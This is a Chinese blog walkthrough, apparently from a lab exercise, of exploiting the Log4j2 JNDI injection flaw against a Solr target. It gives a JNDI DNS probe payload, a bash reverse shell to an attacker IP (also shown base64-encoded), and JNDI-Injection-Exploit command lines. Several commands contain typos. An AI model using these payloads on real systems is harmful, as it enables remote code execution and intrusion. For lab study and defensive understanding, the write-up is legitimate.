当前位置: 首页 > news >正文

log4j2漏洞练习

      log4j2 是Apache的一个java日志框架,我们借助它进行日志相关操作管理,然而在2021年末log4j2爆出了远程代码执行漏洞,属于严重等级的漏洞。apache log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响的版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行,且利用条件低,影响范围广,小到网站,大到可联网的车都受影响。

      打开靶场后,我们进入这样的一个页面,在/solr/admin/cores的目录下可以上传参数,构造一个参数:${jndi:dns://${sys:java.version}.example.com},其中example.com是从dnslog中随机获取的一个地址

我们将参数提交访问后回到dnslog页面刷新查看就会得到版本信息

然后我们准备尝试反弹shell,先构造pyload

ash -i >& /dev/tcp/http://123.57.239.114/8888 0>&1
//反弹shell,ip为攻击机ipYXNoIC1pID4mIC9kZXYvdGNwL2h0dHA6Ly8xMjMuNTcuMjM5LjExNC84ODg4IDA+JjE=
//编码后的反弹shelljava -jar target/INDI-Injection-Exploit-1.0-SNAPSH0T-all.jar -C "bash -c{echo,[经过base64编码后的命令]}{base64,-d}|bash"-A 「你的vpsip]
//命令模板java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C"bash -c {echo,YXNoIC1pID4mIC9kZXYvdGNwL2h0dHA6Ly8xMjMuNTcuMjM5LjExNC84ODg4IDA+JjE=}|{base64,-d}|bash" -A 123.57.239.114
//最终pyload
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -i 192.168.116.128

运行后显示如下代码

我们将jdk1.8一栏中的ldap://123.57.239.114:1389/5v2lkc语句复制下来替换拼接到靶场url后面然后点击回车访问,即可反弹shell

http://www.lryc.cn/news/412020.html

相关文章:

  • OpenEuler安装部署教程
  • Canto - hackmyvm
  • 【数据结构进阶】手撕红黑树
  • 【C++从小白到大牛】类和对象
  • Kafka 为什么这么快的七大秘诀,涨知识了
  • 一文解决3D车道线检测:最新单目3D车道线检测综述
  • 稳中向好,今年新招6000人
  • 使用kettle开源工具进行跨库数据同步
  • Golang | Leetcode Golang题解之第307题区域和检索-数组可修改
  • Golang | Leetcode Golang题解之第301题删除无效的括号
  • 【Story】《程序员面试的“八股文”辩论:技术基础与实际能力的博弈》
  • 初步了解泛型
  • 【C#】.net core 6.0 webapi 使用core版本的NPOI的Excel读取数据以及保存数据
  • C++推荐的oj网站
  • springmvc处理http请求的底层逻辑
  • 干货满满,从零到一:编程小白如何在大学成为编程大神?
  • 前端-如何通过docker打包Vue服务成镜像并在本地运行(本地可以通过http://localhost:8080/访问前端服务)
  • 零基础学习【Mybatis】这一篇就够了
  • Shell入门(保姆级教学)
  • 【JDK11和JDK8并行与切换】
  • vue大数据量列表渲染性能优化:虚拟滚动原理
  • 昇思25天学习打卡营第1天|快速入门
  • LinkedList 实现 LRU 缓存
  • ubuntu安装workon
  • (面试必看!)锁策略
  • RAGflow:开源AI框架的创新与应用
  • AI的学习明确路径
  • 【C++】巧用缺省参数与函数重载:提升编程效率的秘密武器
  • mysql排查死锁的几个查询sql
  • 快速部署私有化大模型 毕昇(使用docker-compose方式)